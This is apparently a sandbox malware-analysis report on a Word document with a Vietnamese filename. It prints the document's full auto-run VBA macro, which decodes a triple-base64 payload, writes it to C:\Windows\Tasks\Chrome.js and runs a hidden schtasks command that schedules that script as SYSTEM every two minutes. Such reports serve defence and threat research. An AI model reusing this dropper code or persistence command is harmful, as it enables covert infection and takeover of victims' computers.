VTI SCORE: 100/100
Dynamic Analysis Report |
Classification: - |
b22d7b196ca03b43f9b140732a3d317f328e5d5f53379c2520a0f05a17d6e617 (SHA256)
CV gui PVN vv y kien cua UB ve gia han.doc
Word Document
Created at 2019-01-08 12:39:00
This is a filtered view
This list contains only the embedded files and created files
Filters: |
There are no files for this filter
There are no files in this analysis
Filename | Category | Type | Severity | Actions |
---|
C:\Users\aETAdzjz\Desktop\CV gui PVN vv y kien cua UB ve gia han.doc | Sample File | Word Document |
Suspicious
|
...
|
»
Office Information
»
Description | cmd /c schtasks /create /sc MINUTE /tn "Chrome" /tr "C:\Windows\Tasks\Chrome.js" /mo 2 /F & schtasks /create /sc MINUTE /tn "Chrome" /tr "C:\Windows\Tasks\Chrome.js" /mo 2 /RU SYSTEM |
Creator | A |
Last Modified By | Win7 |
Revision | 7 |
Create Time | 2019-01-04 01:08:00+00:00 |
Modify Time | 2019-01-08 15:02:00+00:00 |
Document Information
»
Application | Microsoft Office Word |
App Version | 16.0000 |
Template | Normal |
Document Security | SecurityFlag.NONE |
Editing Time | 18.0 |
Page Count | 1 |
Line Count | 10 |
Paragraph Count | 2 |
Word Count | 222 |
Character Count | 1269 |
Chars With Spaces | 1489 |
Heading Pairs | Title |
ScaleCrop | |
SharedDoc |
VBA Macros (1)
»
Macro #1: ThisDocument
»
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function Base64Decode(B64 As String) As String
On Error GoTo over
Dim OutStr() As Byte, i As Long, j As Long
Const B64_CHAR_DICT = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
If InStr(1, B64, "=") <> 0 Then B64 = Left(B64, InStr(1, B64, "=") - 1)
Dim kk, length As Long, mods As Long
mods = Len(B64) Mod 4
length = Len(B64) - mods
ReDim OutStr(length / 4 * 3 - 1 + Switch(mods = 0, 0, mods = 2, 1, mods = 3, 2))
For i = 1 To length Step 4
Dim buf(3) As Byte
For j = 0 To 3
buf(j) = InStr(1, B64_CHAR_DICT, Mid(B64, i + j, 1)) - 1
Next
OutStr((i - 1) / 4 * 3) = buf(0) * &H4 + (buf(1) And &H30) / &H10
OutStr((i - 1) / 4 * 3 + 1) = (buf(1) And &HF) * &H10 + (buf(2) And &H3C) / &H4
OutStr((i - 1) / 4 * 3 + 2) = (buf(2) And &H3) * &H40 + buf(3)
Next
If mods = 2 Then
OutStr(length / 4 * 3) = (InStr(1, B64_CHAR_DICT, Mid(B64, length + 1, 1)) - 1) * &H4 + ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 2, 1)) - 1) And &H30) / 16
ElseIf mods = 3 Then
OutStr(length / 4 * 3) = (InStr(1, B64_CHAR_DICT, Mid(B64, length + 1, 1)) - 1) * &H4 + ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 2, 1)) - 1) And &H30) / 16
OutStr(length / 4 * 3 + 1) = ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 2, 1)) - 1) And &HF) * &H10 + ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 3, 1)) - 1) And &H3C) / &H4
End If
For i = 0 To UBound(OutStr)
Base64Decode = Base64Decode & Chr(OutStr(i))
Next i
over:
End Function
Private Sub Document_Open()
Dim strBs0 As String
Dim strBs1 As String
Dim strBs2 As String
Dim strBs3 As String
strBs0 = "WkcxR2VVbEhUVGxLTWs1SVQxUk9ZVmRGY0RaWlZXUlhZekpLUkZGWVVtbGlWR3d6VTFWTmVHSkhWa2hXYlhCS1VqQnZNVmt3WkVkbGJVNDFVVmhTV21WVlJuQlRhMmhLVDFaam" & _
"VGUnFWbXBOTVVweldXeE5NVlF4Y0ZsVldGWlhUV3hhY0ZaWE1WZGxSMUpZVm01d2ExSnFRVEpVTW5SUFpWWndXRkpxUW1GVk1tUjFXVlZvVTAxSFRrVmlNMXBOWld0VmVGUnJUV" & _
"EJsUlRWd1RraHdUMlZVVWpSVVYzQktaR3hKZVU5WVdtRk5ibWh6Vm14b1EyRXhiRmxWYlhoTlRWWmFNMWRyWkVkTlJuQlVUbGhrYUZORlJuVlRNVko2V2pCd1NWTnRlR3BOTUVV" & _
"MVUydG9TbVJXU1hsV2FrSldZbFphTmxrd1l6VmtWMDE1VmxjNVRGWklUbkpaTWpGWFpXMU9TVlJxUW1waVZscHZXV3hSZDJFeVRuUldibkJxVVhwV1NWZHNhRk5WTVhCWlZHNWt" & _
"hVTFxVmpaWGJGcFBUVWRPZEZadGFHbFZNbVIzVkROc1FtRXlUWHBUVkd4cFlsWlplbFJHWXpWaFYwWjBWbTF3YTFFd1NsVmFWbWhQVFVad1dFMUlWbFJXVkdneFZsUk9VMlZXY0" & _
"ZoU2JsSldZbFphYjFkclpGZGxWV3hFVlc1c1lWZEZOVE5aZWs1VFpWWndXRkp1VWxCbFZVWnlWVlJKZUdFeFFsUlZibkJxWVZSV1ZGZHNaRWRoTVZwSVQxVmFhV0pXUm5aVE1WS" & _
"jZZVEZGZVUxWGRGRldibEpWV2xab1QwMUdjRmhOU0ZaWFVqRlpNRnBGVFRGU2JVcDBWRzVhWVZJeWVERlhha1YzVG1zNWMxWnNWbE5oYldReFZXcEtWMDFHVlhwVmJteG9WbnBX" & _
"ZFZNd1dqQldSMVpaVkdwQ1lWWjZRakZWVkVrMVpGZFNkRlp1Ykd0U2FrRXlWREowWVdWWFNYbE5WVTVhVjBVMWMxUnRjRk5XUjFKSlUyNUNhV0pYVG5aVGExWlBaRVp3UkdFelF" & _
"sQmxWVVp5VjFSSmVHRXhVWHBXYWtKUlZsZDRNVnBITURWamJIQlVUVlZhYkZORlNqVlhiR2hQWlcxR1dFOVlWa3BSZWtaRldXcEplR1JHYkZoT1YzUlFZVlpLUlZsc1pGTlBSbE" & _
"Y2Vm1wQ1RWWnJOSGRaTWpGelpGWndObU15ZEZaaVZscEZXV3hrVWs5V1kzZFVibHBwWW14d2Mxa3lOVk5hUlRseFkwWldhVTFGY0c5WmVrcFdUV3MxUjFScVFtcGlWM2d4VjI1c" & _
"2IxbHNWWHBpU0hCclVqRmFNRlJIZUZOaVIxWkpWVmhXVTFaNlZuRlpha3BUWTBkS2RGcEhVbEJoYmtKWFZtdFdXazVGZUhKYVIzaHJVbFZ2TVZwRlpGZGxhM1JFVlcxd2FWWXhT" & _
"bEZhUm1oU1kwVjBWV015ZEd0WFJscDNWMnRSZUZOdFNuVlhibHBvVFd4V01GVnNhRzlrTWs1MFZtNXdhazF0ZURKWmJXeENaRVpGZVU5WVVtbFdNRm94VjJ0U2RtSnRVWGxOV0V" & _
"KYVpWVktjVmw2VGtObFYwbDVWV3BHV2sweFJtNVhha3BYVFVWc1NWWnFSbWhXTVVaMVdtdFZOVTFYVWtSTlZsSnJVMFZ3ZDFsdE1XcE9NSEJIVTIxNGExWXllSEpWUmxvd1VrZE" & _
"plVTVVU21GWFJXOTNWMFpTZGs1c1draFBWVTVhVjBVMWMxUnRjRk5XUjFKSlUyNUNhV0pYVG5aV2VrWlBUbGROZWxWdGVHbFZlbFpXVjJ4b2IwMUZlSEpXYmxaYVRXcHNjbGxXW" & _
"XpGaWJHaFZZbnBhVjFac1NraFVNRTB4VTBad1dWVnJUbXhYUmtweldUTnNibUV5VWxsV2JrSmhVVEowZDFRemJGTlZWMUpaVkc1T1VWVXdSblZaVldoVFRVZE9SV0l6V2sxbGEx" & _
"VjRWR3ROTUdWRk5YQk9TSEJQWlZSU05GUlhjRXBrYkVsNVQxaGFZVTF1YUhOV2JHaERZVEZzV1ZWdGVFMU5SMUl5V1dwS2EyTXhjRlJPV0dSb1UwVkZkbFpHWkVkaGJFSlVXWHB" & _
"rUzFKclNYaFpla296VDFWd1IxRnFSbXBOYm1SNVUydGFTMkpIVWxoaVIzUlFaVlpLVWxwR2FFOWpNVUpVVld4R2ExZEZOWHBUTTJ4cVRERktTRkpxUWxwV1JFSjFWRE5zVTFWWF" & _
"VsbFViazVSVlRGS1VscEdhRTlqTUhRMVZXeE9ZVlpWTlRCWGExSXdXV3hWZW1KSWNHdFNNVm93VkVkek1XSkhVa1JPVm1oaFZqQndWRmRzYUVkTlZuQlpWR3BDV1ZVeFNYcFhiR" & _
"1JMVlRGd1dWSnFSbUZYUlRSM1ZVWmFNRlpIVmxsVWFrSmhWbnBDTVZaSE1WZE5SWGh6V2tkNFdtSkZjSE5aTVdoWFlrZE5lbFZ0VWxCaGJrSkZXVEl4VjJGSFVraFdWemxMVW10SmVGbDZTak5qUlRrMVZXcE9ZVll3Y0ZSWGJHaEhUVlp3V1ZScVFrMWhla1p6V2tWa2IyUnNjRVZOUnpWV1VsUnNWVlpyVG1wT01IQkpXa2Q0V21KRmNITlpNV2hYWWtkTmVsVll" & _
"WbE5OYkZsM1ZsY3hWMlZ0VGtoUFdGWnFUV3hXZGxNeFVucGhWVGt6VUZRd2JrOTNjRVZSYWxrd1NVUXdaMXB1Vm5WWk0xSndZakkwYjJONWEyZGxkMjluU1VOQloyUnRSbmxKUjFVNVpUTXdjMkZUZUdsUVZFRnpXWGw0TkV4SGR6bE5RM2hvVEVoSk9VcDVZM05rZWpGVVpFaEtjR0p0WTNWYWJrcDJZbFZPYjFsWVNrUmlNbEpzVEVWM09XTjVOWE5hVnpWdVpFZ" & _
"G5OME5wUVdkSlEwSXlXVmhKWjFGVU1HbFJWVXBFVWtWV1IxSXdhRXBUYTNSTlZGVTFVRlZHUmxOVk1WSldWbXhrV1ZkV2NHaFpiVTVyV2xkYWJtRkhiSEZoTW5oMFltMDVkMk5ZU25wa1NGWXlaRE5vTldWcVFYaE5hazB3VGxSWk0wOUVhM0pNZVVrM1EybEJaMGxEUW0xaU0wbHZZVlF3ZDA4eWF6aE9hbEUzWVZOemNrdFlkR3hYTUVWMVdUSm9hR05yUmpCTFI" & _
"ydHdXRlF4Y0U4ek1FdEpRMEZuU1VkYWRtTnBhRFJRVkVFM1pVUjRUVTh6WjNKTGVXdzNRMmxCWjBsRFFXZEpRMEZuV1hveGJGY3pUWFZaTW1ob1kydEdNRXRJWjNCWVZIUnBVRk5vYVZCRWR6SkxVM1JxVHpKM2NsQlVXVGREYVVGblNVTkJaMGxEUVdka01taHdZa2RWYjJKRU5EbFBRMnczUzBOb2FGQlRhR2xRYWpRclMwZDNkRkJVWjNCTFUxbDNaVWRhYlV0W" & _
"WVEaExTR2M0UzBWM2RFMXBhM0JMVTFsdFMwaEpjbEJZWTI5WlUydHdUek13UzBsRFFXZEpTREJMU1VOQlowbElTbXhrU0ZaNVltbENlVTkzY0RsUGQzQXlXVmhKWjJJeVNuRlZNbWhzWWtkM09XSnRWak5KUlVacVpFZHNNbHBXYUZCWmJYQnNXVE5SYjBsc1pGUlpNMHB3WTBoUmRWVXlhR3hpUjNkcFMxUnpTMlJ0Um5sSlIyeFRXbGhTTVdOdE5VUmlNbEpzVUZ" & _
"jNWFXRnNUbTlhVjNoelRHeEtNV0pwYUVWUmFsa3dTMGROY0V4RVFYTmFiVVp6WXpKVmNFOTNQVDA9"
strBs1 = Base64Decode(strBs0)
strBs2 = Base64Decode(strBs1)
strBs3 = Base64Decode(strBs2)
Debug.Print strBs3
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Dim Fileout As Object
Set Fileout = fso.CreateTextFile("C:\Windows\Tasks\Chrome.js", True, True)
Fileout.Write strBs3
Fileout.Close
Dim dp As DocumentProperty
For Each dp In ActiveDocument.BuiltInDocumentProperties
If dp.Name = "Comments" Then
Shell (dp.Value)
End If
Next
End Sub
YARA Matches
»
Rule Name | Rule Description | Classification | Severity | Actions |
---|---|---|---|---|
VBA_Create_File | VBA macro contains file creation commands; possible dropper | - |
3/5
|
...
|
VBA_Create_File | VBA macro contains file creation commands; possible dropper | - |
3/5
|
...
|
49d2bc305daf1fcca84d6a282e52d1dfd2d79e9ca9f96a3a435d058ae2d8f755 | Embedded File | XML |
Whitelisted
|
...
|
»
File Reputation Information
»
Severity |
Whitelisted
|
First Seen | 2013-04-24 20:22 (UTC+2) |
Last Seen | 2018-08-16 17:44 (UTC+2) |
c97833e6456aa2bfe9be614f9c3ae41a8ef764b1cc3af92c6a6f273c62309122 | Embedded File | XML |
Whitelisted
|
...
|
»
File Reputation Information
»
Severity |
Whitelisted
|
First Seen | 2012-11-16 07:03 (UTC+1) |
Last Seen | 2019-01-06 12:21 (UTC+1) |
5312661b9e1d78deefa38ba96b6ffa090d005472235ff083b54dde9d73a56276 | Embedded File | Text |
Unknown
|
...
|
»
52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc | Embedded File | Unknown |
Unknown
|
...
|
»
b6a2282545ac0eac69c91f9092d9109c993527d1f0e03b0457acc5721fe12175 | Embedded File | XML |
Unknown
|
...
|
»
81d22ccf51ee4c30533dd16600b90ae1b17310ec88d17348eccba08cdb4528eb | Embedded File | XML |
Unknown
|
...
|
»